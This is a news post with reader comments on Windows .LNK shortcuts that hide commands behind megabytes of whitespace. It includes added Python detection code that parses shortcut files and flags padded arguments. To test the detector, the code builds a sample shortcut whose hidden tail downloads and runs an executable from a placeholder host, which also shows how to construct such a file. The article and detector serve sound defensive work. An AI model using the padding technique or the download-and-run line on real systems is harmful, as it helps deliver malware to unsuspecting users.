



Microsoft Isn't Fixing 8-Year-Old Shortcut Exploit Abused For Spying (theregister.com)
Trend Micro uncovered an eight-year-long spying campaign exploiting a Windows vulnerability involving malicious .LNK shortcut files, which attackers padded with whitespace to conceal commands. Despite being reported to Microsoft in 2023, the company considers it a UI issue rather than a security risk and has not prioritized a fix. The Register reports: The attack method is low-tech but effective, relying on malicious .LNK shortcut files rigged with commands to download malware. While appearing to point to legitimate files or executables, these shortcuts quietly include extra instructions to fetch or unpack and attempt to run malicious payloads. Ordinarily, the shortcut's target and command-line arguments would be clearly visible in Windows, making suspicious commands easy to spot. But Trend's Zero Day Initiative said it observed North Korea-backed crews padding out the command-line arguments with megabytes of whitespace, burying the actual commands deep out of sight in the user interface.
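The padding trick above is easy to check for on disk, because a shortcut's command line is stored in plain form in the .LNK file itself (the COMMAND_LINE_ARGUMENTS field of MS-SHLLINK) regardless of how much of it Explorer displays. The following is an added example, not code from Trend Micro, the Zero Day Initiative or The Register: a minimal Shell Link parser that pulls out the StringData fields, plus a check that flags arguments where a long run of whitespace is followed by more text. The sample shortcut is constructed inline by `build_lnk` and carries no IDList or LinkInfo, so it exercises the parser but is not necessarily one Explorer would resolve; the set of characters treated as padding, the 256-character threshold and the cp1252 fallback for non-Unicode strings are all assumptions.

```python
import re
import struct
from typing import Optional

HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046} in on-disk byte order
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

# StringData fields in on-disk order, each present only if its flag bit is set
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION))

# Characters counted as padding (assumption: space, tab, LF, VT, FF, CR)
PADDING_CLASS = r"[ \t\n\x0b\x0c\r]"


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link file as {name: str}."""
    if (len(data) < HEADER_SIZE or data[:4] != struct.pack("<I", HEADER_SIZE)
            or data[4:20] != LINK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize covers the whole block
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for name, flag in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {name} string")
        # ANSI strings use the system code page; cp1252 is an assumption here
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252")
        pos += nbytes
    return fields


def find_padded_command(arguments: str, min_run: int = 256) -> Optional[dict]:
    """Return the visible prefix, padding length and hidden tail when at least
    min_run padding characters are followed by more text; else None."""
    m = re.search(PADDING_CLASS + "{%d,}" % min_run, arguments)
    if m is None:
        return None
    hidden = arguments[m.end():]
    if not re.sub(PADDING_CLASS, "", hidden):   # only trailing whitespace: nothing hidden
        return None
    return {"visible": arguments[:m.start()],
            "padding_run": m.end() - m.start(), "hidden": hidden}


def scan_lnk(data: bytes, min_run: int = 256) -> Optional[dict]:
    """Parse a .LNK and apply the padding check to its COMMAND_LINE_ARGUMENTS."""
    return find_padded_command(parse_lnk(data).get("arguments", ""), min_run)


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .LNK with only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.
    Constructed for the demo; no IDList or LinkInfo, so Explorer may not resolve it."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0x20,        # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,     # creation / access / write FILETIME
                         0, 0, 1,     # FileSize, IconIndex, ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    terminal_block = struct.pack("<I", 0)  # ExtraData ends with a block of size < 4
    return header + string_data(relative_path) + string_data(arguments) + terminal_block


# Constructed sample, not an in-the-wild file: visibly opens a document, but
# 4096 spaces later the arguments continue with a download-and-run chain.
HIDDEN_TAIL = "& curl.exe -o %TEMP%\\a.exe http://example.invalid/a & %TEMP%\\a.exe"
SAMPLE_LNK = build_lnk("cmd.exe", "/c start report.pdf" + " " * 4096 + HIDDEN_TAIL)
BENIGN_LNK = build_lnk("notepad.exe", "report.txt")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("padded", SAMPLE_LNK)):
        hit = scan_lnk(blob)
        if hit is None:
            print(f"{label}: no padded command")
        else:
            print(f"{label}: {hit['padding_run']} padding chars hide {hit['hidden']!r}")
```

Point `scan_lnk` at the bytes of any real shortcut (for example from a mail gateway or a file share) and it skips the IDList and LinkInfo structures by their own size fields before reading the strings, so the check does not depend on what the Properties dialog chooses to render. The threshold is deliberately generous: legitimate shortcuts rarely carry more than a handful of consecutive spaces in their arguments, while the samples described above carried megabytes.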
Trend reported this to Microsoft in September last year and estimates that it has been used since 2017. It said it had found nearly 1,000 tampered .LNK files in circulation but estimates the actual number of attacks could have been higher. "This is one of many bugs that the attackers are using, but this is one that is not patched and that's why we reported it as a zero day," Dustin Childs, head of threat awareness at the Zero Day Initiative, told The Register. "We told Microsoft but they consider it a UI issue, not a security issue. So it doesn't meet their bar for servicing as a security update, but it might be fixed in a later OS version, or something along those lines."
After poring over malicious .LNK samples, the security shop said it found the vast majority of these files were from state-sponsored attackers (around 70 percent), used for espionage or information theft, with another 20 percent going after financial gain. Among the state-sponsored crews, 46 percent of attacks came from North Korea, while Russia, Iran, and China each accounted for around 18 percent of the activity.
I kind of agree. (Score:4, Informative)
Re: (Score:3)
Yeah... LNK files are like executables. Better treat them as such: forbid them from being downloaded from the internet or opened if stored on an external USB drive. Also forbid receipt of archive files such as .ZIP containing LNK files.
Also... I've got to ask: why is there no maximum length for the shortcut target in an LNK file?
I understand there are long filenames and they should be allowed, but allowing Megabytes of text seems bad.
Why not add a limit that LNK files with targets longer than 65,535
Just wondering ... (Score:2)
How would such a .LNK file come onto my computer? Asking for a friend ...
Seriously, there must be a minimum of 2 steps:
- I install the link/shortcut file, and then I know perfectly well what it is doing
- someone runs to my computer when I am on the toilet and installs it
and now ---> someone has to execute it! And that would not be me, as I don't execute unknown stuff - actually, I do not have any unknown stuff.
Definitely not from Russia (Score:2)
So says the CIA and FBI.
download and run (Score:2)
Why (Score:2)
is this "bug" 8 years old, instead of 30 years old? LNK files first appeared in Windows 95, if I remember correctly. What saves Windows 95 from being exploited? Inability to put megabytes of junk in the LNK?